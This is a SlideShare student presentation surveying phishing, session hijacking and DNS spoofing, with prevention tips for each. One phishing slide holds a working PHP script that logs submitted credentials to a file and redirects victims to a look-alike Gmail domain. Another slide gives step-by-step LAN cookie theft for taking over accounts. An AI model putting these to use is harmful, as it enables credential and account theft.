SlideShare a Scribd company logo

Attacks on the cyber world

Download as PPTX, PDF
Nikhil Tripathi
Nikhil Tripathi

This presentation give you a brief idea about some of the popuplar attacks like phishing, sniffing, session hijacking, DNS poisoning

EducationTechnologyNews & Politics
1 of 31
ATTACKS ON THE CYBER WORLD BY: NIKHIL TRIPATHI(12MCMB10) TARUN MEHROTRA(12MCMB11) SUDHIR KUMAR PANDEY(12MCMB14 )
FLOW OF CONTENTS  INTRODUCTION  TYPES OF ATTACKS  SOCIAL ENGINEERING  PHISHING  SESSION HIJACKING  DNS SPOOFING  CONCLUSION  REFERENCES
INTRODUCTION “A threat where weapons are computers- the most destructive weapon on the planet.” - Kevin Mitnick • 528.1 % is the growth rate of internet users over 2000-2011. • 85% of business and government agencies detected security breaches. • FBI estimates that the United States loses up to $10 billion a year to cyber crime. • In INDIA, 30 million people fell victim to cyber crime last year resulting in loss of Rs34,110 crore, annually. • Being INTERNET addicted, only one question should arise in our minds—
INTRODUCTION “A threat where weapons are computers- the most destructive weapon on the planet.” - Kevin Mitnick • 528.1 % is the growth rate of internet users over 2000-2011. • 85% of business and government agencies detected security breaches. • FBI estimates that the United States loses up to $10 billion a year to cyber crime. • In INDIA, 30 million people fell victim to cyber crime last year resulting in loss of Rs34,110 crore, annually. • Being INTERNET addicted, only one question should arise in our minds— HOW MUCH WE ARE SECURE?????
VARIOUS ATTACKS •More or less, hundreds of exploits are there which hackers practice on the individual hosts or even on the whole network. •Some of the most popular and dangerous attacks are: > SESSION HIJACKING (SNIFFING). > PHISHING. > DOS ATTACK (SMURFING). > DNS POISONING(DNS SPOOFING). > SQL INJECTION. > FAKE EMAILING AND EMAIL BOMBING. > TROJAN HORSES, KEYLOGGERS and many more….
SOCIAL ENGINEERING •Art of manipulating people into performing actions or divulging confidential information. •An art of DECEPTION. •Varies from purely technical to purely non-technical. •Depends upon the victim’s cyber knowledge. •Depends upon till what extent attacker is spoofing its identity. •Result of human’s unawareness about the cyber crimes. •Initiation of almost all the cyber attacks practiced nowadays. •One of the most dangerous and most effective technique. •PHISHING is an example of technical social engineering.
PHISHING •Act of attempting to acquire information such as usernames, passwords, by masquerading as a trustworthy entity in an electronic communication. •Started in late 90’s. •Named after the earlier hackers, known as phreakers… •Still, the most effective and most dangerous social-engineering attack. •Overall cost due to online fraud by phishing reached to 3 Billion $ in 2007. •In 2011, it reached the peak of 94 Billion $. •Main reason for growth in phishing scam is the users’ unawareness.
PHISHING(contd.)
HOW IT WORKS? Components of Phishing are:- •A fake page •A PHP script to redirect user to the original page containing some notifications •The redirected original page along with some notification •The generated text file having username and password
SCREENSHOTS FOR PHISHING DEMO
Working(contd.) •Change the redirected url to the url of PHP file and make sure that both the fake page and PHP script is present within the same directory. •Change the method from POST to GET. •PHP code:- <?php header("Location: http://gmaiil.t35.com/ServiceLoginAuth.htm"); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?>
HOW TO PREVENT PHISHING? 1. The most basic thing is to see the lock beside the url field of the browser. 2. Check the url. 3. Check the certificate allotted to the company by the authorized party. E.g. Thawte Consulting in case of Google. 4. If possible, enter the IP address for the gmail.com instead of the domain name. Its time taking but far secure for phishing and DNS poisoning to happen. But what if it is combined with other attacks?
SESSION HIJACKING •Used to refer to the theft of a magic cookie responsible to authenticate a user to a remote server. •Some basic methods to implement the attack: Session fixation, Cross-site scripting and the most popular one- Session sidejacking . •Started in 2004 and gained popularity among the hackers like a wildfire. •American National agencies faced million dollars losses due to this attack. •Falls into the category of the deadliest attacks due to occurrences of huge losses. •Can be implemented by first capturing the packets and then analyzing it. •Cain & Abel is popular for capturing and APR and Wireshark/Ettercap is popular for analyzing the packets.
HOW IT WORKS? 1. Applicable only if using LANs for accessing the internet. 2. Victim access the internet by accessing the default gateway. 3. Attacker sitting in the same network captures the packet going from victim’s machine to the default gateway and vice-versa. 4. Now, after capturing, attacker analyze the packets and read the cookies. 5. Next, attacker copies those cookies and set it into his/her browser. 6. That’s it. Now, he’ll get access to user’s account.
WORKING(contd.)
SCREENSHOTS FOR SESSION HIGHJACKING
HOW TO PREVENT SESSION HIJACKING? 1. If possible, never use any shared network to access your accounts. 2. Otherwise, log out after every few seconds, but it seems impossible. 3. The best way is that web servers should use time stamped cookies but it is still in somewhat, testing phase. 4. Otherwise, use HTTPs to encrypt the traffic. But what if attacker intentionally downgrades your HTTPs connection to HTTP!!!
DNS POISONING • An attack where victim’s machine gets fooled and redirected to some other server rather than the desired server. •Also called DNS spoofing. •Attacker poisons the DNS cache entry so it starts giving false results. •Cain & Abel can be used for this purpose by using MAN-IN-THE-MIDDLE attack. •Being an insecure protocol, any host can resolve the query generated by a user.
HOW IT WORKS?
HOW TO PREVENT DNS POISONING? •The only way to prevent DNS poisoning is by making this protocol a secure one. Research is still going on in this field under the brolly of Verisign Inc. •The new protocol will be named as DNSSEC(Domain Name System Security Extension). •http://verisigninc.com is the only domain yet which we found as DNSSEC enabled. •DNSSEC-enabled packets are larger (> 512 bytes) than traditional DNS packets. •DNSSEC will generate more TCP traffic. •DNSSEC requires support for EDNS0. •Thus, a huge change will be required before DNSSEC implementation.
CONCLUSION •Many attacks are being practiced on the internet all round the globe. •Along with these attacks, some mechanisms are there to be secure from these attacks. •But these mechanisms are not enough to secure us from all the possibilities. •The day is not away from us when the two important components of Internet will be DNSSEC and IPv6 rather than DNS and IPv4. At that time ,may be, we can say that internet is now secure. •But what to do untill that day? How to be completely secure in this cyber world?? •Till then, the only answer which one can think of is---
CONCLUSION •Many attacks are being practiced on the internet all round the globe. •Along with these attacks, some mechanisms are there to be secure from these attacks. •But these mechanisms are not enough to secure us from all the possibilities. •The day is not away from us when the two important components of Internet will be DNSSEC and IPv6 rather than DNS and IPv4. At that time ,may be, we can say that internet is now secure. •But what to do untill that day? How to be completely secure in this cyber world?? •Till then, the only answer which one can think of is--- STAY AWAY FROM INTERNET!!! Its not the proper answer, but at least, its true….
REFERENCES •http://firewall.cx •http://social-engineer.org •http://hackforums.net •http://defcon.org •http://networkworld.com •http://verisigninc.com •http://stackoverflow.com •http://sessionhijack.com
THANK YOU…

Recommended

Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Andrew Morris
 
Ransomware: How to avoid a crypto crisis at your IT business
Ransomware: How to avoid a crypto crisis at your IT businessRansomware: How to avoid a crypto crisis at your IT business
Ransomware: How to avoid a crypto crisis at your IT businessCalyptix Security
 
Dos & Ddos Attack. Man in The Middle Attack
Dos & Ddos Attack. Man in The Middle AttackDos & Ddos Attack. Man in The Middle Attack
Dos & Ddos Attack. Man in The Middle Attackmarada0033
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...Andrew Morris
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkAdvantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkJack Shaffer
 
Ransomware: History, Analysis, & Mitigation - PDF
Ransomware: History, Analysis, & Mitigation - PDFRansomware: History, Analysis, & Mitigation - PDF
Ransomware: History, Analysis, & Mitigation - PDFAndy Thompson
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsAndrew Morris
 

Recommended

Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ...Andrew Morris
 
Ransomware: How to avoid a crypto crisis at your IT business
Ransomware: How to avoid a crypto crisis at your IT businessRansomware: How to avoid a crypto crisis at your IT business
Ransomware: How to avoid a crypto crisis at your IT businessCalyptix Security
 
Dos & Ddos Attack. Man in The Middle Attack
Dos & Ddos Attack. Man in The Middle AttackDos & Ddos Attack. Man in The Middle Attack
Dos & Ddos Attack. Man in The Middle Attackmarada0033
 
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...Andrew Morris
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkAdvantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkJack Shaffer
 
Ransomware: History, Analysis, & Mitigation - PDF
Ransomware: History, Analysis, & Mitigation - PDFRansomware: History, Analysis, & Mitigation - PDF
Ransomware: History, Analysis, & Mitigation - PDFAndy Thompson
 
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsUsing GreyNoise to Quantify Response Time of Cloud Provider Abuse Teams
Using GreyNoise to Quantify Response Time of Cloud Provider Abuse TeamsAndrew Morris
 
Blackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of RansomwareBlackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of RansomwareJohn Bambenek
 
Ransomware: Emergence of the Cyber-Extortion Menace
Ransomware: Emergence of the Cyber-Extortion MenaceRansomware: Emergence of the Cyber-Extortion Menace
Ransomware: Emergence of the Cyber-Extortion MenaceZubair Baig
 
WHITE PAPER▶ The Evolution of Ransomware
WHITE PAPER▶ The Evolution of RansomwareWHITE PAPER▶ The Evolution of Ransomware
WHITE PAPER▶ The Evolution of RansomwareSymantec
 
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...ClearDATACloud
 
Ransomware: History, Analysis, & Mitigation
Ransomware: History, Analysis, & MitigationRansomware: History, Analysis, & Mitigation
Ransomware: History, Analysis, & MitigationWhiskeyNeon
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedThomas Roccia
 
Hacking final
Hacking finalHacking final
Hacking finalJiyaaNaqvi
 
Ransomware - Impact, Evolution, Prevention
Ransomware - Impact, Evolution, PreventionRansomware - Impact, Evolution, Prevention
Ransomware - Impact, Evolution, PreventionMohammad Yahya
 
Computer Security Hacking
Computer Security HackingComputer Security Hacking
Computer Security HackingErdo Deshiant Garnaby
 
Ransomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataRansomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataInderjeet Singh
 
Ransomware
Ransomware Ransomware
Ransomware Armor
 
Hacking and Types of Hacker.
Hacking and Types of Hacker.Hacking and Types of Hacker.
Hacking and Types of Hacker.Coder Tech
 
Computer Security
Computer SecurityComputer Security
Computer SecurityGreater Noida Institute Of Technology
 
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green North Texas Chapter of the ISSA
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Roger Hagedorn
 
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at RiskClearDATACloud
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec
 
Information-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptxInformation-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptxanbersattar
 
WannaCry / Wannacrypt Ransomware
WannaCry / Wannacrypt RansomwareWannaCry / Wannacrypt Ransomware
WannaCry / Wannacrypt RansomwareAyoub Rouzi
 
Ransomware: Prevention, privacy and your options post-breach
Ransomware: Prevention, privacy and your options post-breachRansomware: Prevention, privacy and your options post-breach
Ransomware: Prevention, privacy and your options post-breachGowling WLG
 
Securing Yourself in the Cyber World
Securing Yourself in the Cyber WorldSecuring Yourself in the Cyber World
Securing Yourself in the Cyber WorldEmil Tan
 
Cyber Loss Model for the cost of a data breach.
Cyber Loss Model for the cost of a data breach.Cyber Loss Model for the cost of a data breach.
Cyber Loss Model for the cost of a data breach.Thomas Lee
 

More Related Content

What's hot

Blackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of RansomwareBlackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of RansomwareJohn Bambenek
 
Ransomware: Emergence of the Cyber-Extortion Menace
Ransomware: Emergence of the Cyber-Extortion MenaceRansomware: Emergence of the Cyber-Extortion Menace
Ransomware: Emergence of the Cyber-Extortion MenaceZubair Baig
 
WHITE PAPER▶ The Evolution of Ransomware
WHITE PAPER▶ The Evolution of RansomwareWHITE PAPER▶ The Evolution of Ransomware
WHITE PAPER▶ The Evolution of RansomwareSymantec
 
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...ClearDATACloud
 
Ransomware: History, Analysis, & Mitigation
Ransomware: History, Analysis, & MitigationRansomware: History, Analysis, & Mitigation
Ransomware: History, Analysis, & MitigationWhiskeyNeon
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedThomas Roccia
 
Ransomware - Impact, Evolution, Prevention
Ransomware - Impact, Evolution, PreventionRansomware - Impact, Evolution, Prevention
Ransomware - Impact, Evolution, PreventionMohammad Yahya
 
Ransomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataRansomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataInderjeet Singh
 
Ransomware
Ransomware Ransomware
Ransomware Armor
 
Hacking and Types of Hacker.
Hacking and Types of Hacker.Hacking and Types of Hacker.
Hacking and Types of Hacker.Coder Tech
 
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green North Texas Chapter of the ISSA
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Roger Hagedorn
 
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at RiskClearDATACloud
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec
 
Information-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptxInformation-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptxanbersattar
 
WannaCry / Wannacrypt Ransomware
WannaCry / Wannacrypt RansomwareWannaCry / Wannacrypt Ransomware
WannaCry / Wannacrypt RansomwareAyoub Rouzi
 
Ransomware: Prevention, privacy and your options post-breach
Ransomware: Prevention, privacy and your options post-breachRansomware: Prevention, privacy and your options post-breach
Ransomware: Prevention, privacy and your options post-breachGowling WLG
 

What's hot (20)

Blackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of RansomwareBlackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of Ransomware
 
Ransomware: Emergence of the Cyber-Extortion Menace
Ransomware: Emergence of the Cyber-Extortion MenaceRansomware: Emergence of the Cyber-Extortion Menace
Ransomware: Emergence of the Cyber-Extortion Menace
 
WHITE PAPER▶ The Evolution of Ransomware
WHITE PAPER▶ The Evolution of RansomwareWHITE PAPER▶ The Evolution of Ransomware
WHITE PAPER▶ The Evolution of Ransomware
 
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
5 Ways to Protect Your Healthcare Organization from a Ransomware Attack - HIM...
 
Ransomware: History, Analysis, & Mitigation
Ransomware: History, Analysis, & MitigationRansomware: History, Analysis, & Mitigation
Ransomware: History, Analysis, & Mitigation
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons Learned
 
Hacking final
Hacking finalHacking final
Hacking final
 
Ransomware - Impact, Evolution, Prevention
Ransomware - Impact, Evolution, PreventionRansomware - Impact, Evolution, Prevention
Ransomware - Impact, Evolution, Prevention
 
Computer Security Hacking
Computer Security HackingComputer Security Hacking
Computer Security Hacking
 
Ransomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataRansomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your Data
 
Ransomware
Ransomware Ransomware
Ransomware
 
Hacking and Types of Hacker.
Hacking and Types of Hacker.Hacking and Types of Hacker.
Hacking and Types of Hacker.
 
Computer Security
Computer SecurityComputer Security
Computer Security
 
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
Networking 2016-05-24 - Topic 1- Cybereason Lab Analysis by Brad Green
 
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
Your Money or Your Data: Ransomware, Cyber Security and Today’s Threat Landsc...
 
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
5 Ways Technology Vendors Put Their Healthcare Customer's PHI at Risk
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
 
Information-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptxInformation-Security-Lecture-8.pptx
Information-Security-Lecture-8.pptx
 
WannaCry / Wannacrypt Ransomware
WannaCry / Wannacrypt RansomwareWannaCry / Wannacrypt Ransomware
WannaCry / Wannacrypt Ransomware
 
Ransomware: Prevention, privacy and your options post-breach
Ransomware: Prevention, privacy and your options post-breachRansomware: Prevention, privacy and your options post-breach
Ransomware: Prevention, privacy and your options post-breach
 

Viewers also liked

Securing Yourself in the Cyber World
Securing Yourself in the Cyber WorldSecuring Yourself in the Cyber World
Securing Yourself in the Cyber WorldEmil Tan
 
Cyber Loss Model for the cost of a data breach.
Cyber Loss Model for the cost of a data breach.Cyber Loss Model for the cost of a data breach.
Cyber Loss Model for the cost of a data breach.Thomas Lee
 
Stalking in the Cyberspace
Stalking in the CyberspaceStalking in the Cyberspace
Stalking in the CyberspaceEmil Tan
 
A Multidisciplinary Perspective on Cybersecurity
A Multidisciplinary Perspective on CybersecurityA Multidisciplinary Perspective on Cybersecurity
A Multidisciplinary Perspective on CybersecurityEmil Tan
 
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...Robert Cole
 
Ethical Dilemma/Issues is Cyberworld
Ethical Dilemma/Issues is CyberworldEthical Dilemma/Issues is Cyberworld
Ethical Dilemma/Issues is CyberworldAmae OlFato
 
5 Media Innovations From The Secret Deep Web
5 Media Innovations From The Secret Deep Web5 Media Innovations From The Secret Deep Web
5 Media Innovations From The Secret Deep WebAmber Horsburgh
 
Cyber Security in the Interconnected World
Cyber Security in the Interconnected WorldCyber Security in the Interconnected World
Cyber Security in the Interconnected WorldRussell_Kennedy
 
A Brave New World of Cyber Security and Data Breach
A Brave New World of Cyber Security and Data BreachA Brave New World of Cyber Security and Data Breach
A Brave New World of Cyber Security and Data BreachJim Brashear
 
Cyber Risk in Healthcare Industry- Are you Protected?
Cyber Risk in Healthcare Industry- Are you Protected? Cyber Risk in Healthcare Industry- Are you Protected?
Cyber Risk in Healthcare Industry- Are you Protected? Mark Merrill
 
The Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet AnonymityThe Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet AnonymityAbhimanyu Singh
 
cyber terrorism
cyber terrorismcyber terrorism
cyber terrorismAccenture
 
The Emerging Global Web
The Emerging Global WebThe Emerging Global Web
The Emerging Global Webyiibu
 
Deep Web
Deep WebDeep Web
Deep WebSt John
 
DNS - Domain Name System
DNS - Domain Name SystemDNS - Domain Name System
DNS - Domain Name SystemPeter R. Egli
 

Viewers also liked (20)

Securing Yourself in the Cyber World
Securing Yourself in the Cyber WorldSecuring Yourself in the Cyber World
Securing Yourself in the Cyber World
 
Cyber Loss Model for the cost of a data breach.
Cyber Loss Model for the cost of a data breach.Cyber Loss Model for the cost of a data breach.
Cyber Loss Model for the cost of a data breach.
 
Stalking in the Cyberspace
Stalking in the CyberspaceStalking in the Cyberspace
Stalking in the Cyberspace
 
A Multidisciplinary Perspective on Cybersecurity
A Multidisciplinary Perspective on CybersecurityA Multidisciplinary Perspective on Cybersecurity
A Multidisciplinary Perspective on Cybersecurity
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...
ATME Travel Marketing Conference - How Big Data, Deep Web & Semantic Technolo...
 
Ethical Dilemma/Issues is Cyberworld
Ethical Dilemma/Issues is CyberworldEthical Dilemma/Issues is Cyberworld
Ethical Dilemma/Issues is Cyberworld
 
5 Media Innovations From The Secret Deep Web
5 Media Innovations From The Secret Deep Web5 Media Innovations From The Secret Deep Web
5 Media Innovations From The Secret Deep Web
 
Cyber Security in the Interconnected World
Cyber Security in the Interconnected WorldCyber Security in the Interconnected World
Cyber Security in the Interconnected World
 
A Brave New World of Cyber Security and Data Breach
A Brave New World of Cyber Security and Data BreachA Brave New World of Cyber Security and Data Breach
A Brave New World of Cyber Security and Data Breach
 
Cyber Risk in Healthcare Industry- Are you Protected?
Cyber Risk in Healthcare Industry- Are you Protected? Cyber Risk in Healthcare Industry- Are you Protected?
Cyber Risk in Healthcare Industry- Are you Protected?
 
Deep Web - what to do and what not to do
Deep Web - what to do and what not to do Deep Web - what to do and what not to do
Deep Web - what to do and what not to do
 
The Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet AnonymityThe Deep Web, TOR Network and Internet Anonymity
The Deep Web, TOR Network and Internet Anonymity
 
cyber terrorism
cyber terrorismcyber terrorism
cyber terrorism
 
Web 2.0
Web 2.0Web 2.0
Web 2.0
 
Cyber Terrorism
Cyber TerrorismCyber Terrorism
Cyber Terrorism
 
Malaysia's National Cyber Security Policy
Malaysia's National Cyber Security PolicyMalaysia's National Cyber Security Policy
Malaysia's National Cyber Security Policy
 
The Emerging Global Web
The Emerging Global WebThe Emerging Global Web
The Emerging Global Web
 
Deep Web
Deep WebDeep Web
Deep Web
 
DNS - Domain Name System
DNS - Domain Name SystemDNS - Domain Name System
DNS - Domain Name System
 

Similar to Attacks on the cyber world

You think you are safe online. Are You?
You think you are safe online. Are You?You think you are safe online. Are You?
You think you are safe online. Are You?TechGenie
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Securitybelsis
 
Denial of services : limiting the threat
Denial of services : limiting the threatDenial of services : limiting the threat
Denial of services : limiting the threatSensePost
 
Recognizing security threats
Recognizing security threatsRecognizing security threats
Recognizing security threatsKishore Kumar
 
Meletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information securityMeletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information securityMeletis Belsis MPhil/MRes/BSc
 
DDoS mitigation in the real world
DDoS mitigation in the real worldDDoS mitigation in the real world
DDoS mitigation in the real worldMichael Renner
 
Cyber Crime And Security
Cyber Crime And Security Cyber Crime And Security
Cyber Crime And Security ritik shukla
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdNipun Jaswal
 
Ransomware hostage rescue manual
Ransomware hostage rescue manualRansomware hostage rescue manual
Ransomware hostage rescue manualRoel Palmaers
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITYafaque jaya
 
Cyber Security
Cyber SecurityCyber Security
Cyber Securityfrcarlson
 
Info Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsInfo Session on Cybersecurity & Cybersecurity Study Jams
Info Session on Cybersecurity & Cybersecurity Study JamsGDSCCVR
 
LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewRobert Herjavec
 
3 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 20173 Tips to Stay Safe Online in 2017
3 Tips to Stay Safe Online in 2017Bret Piatt
 
Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.Hacking- Ethical/ Non-ethical, Cyber Security.
Hacking- Ethical/ Non-ethical, Cyber Security.JasminJaman1
 

Similar to Attacks on the cyber world (20)

You think you are safe online. Are You?
You think you are safe online. Are You?You think you are safe online. Are You?
You think you are safe online. Are You?
 
Network Security
Network SecurityNetwork Security
Network Security
 
hacking
hackinghacking
hacking
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
basic knowhow hacking
basic knowhow hackingbasic knowhow hacking
basic knowhow hacking
 
AtlSecCon 2016
AtlSecCon 2016AtlSecCon 2016
AtlSecCon 2016
 
Denial of services : limiting the threat
Denial of services : limiting the threatDenial of services : limiting the threat
Denial of services : limiting the threat
 
Recognizing security threats
Recognizing security threatsRecognizing security threats
Recognizing security threats
 
Hacking intro
Hacking introHacking intro
Hacking intro
 
Meletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information securityMeletis Belsis - Introduction to information security
Meletis Belsis - Introduction to information security
 
DDoS mitigation in the real world
DDoS mitigation in the real worldDDoS mitigation in the real world
DDoS mitigation in the real world
 
Cyber Crime And Security
Cyber Crime And Security Cyber Crime And Security
Cyber Crime And Security
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
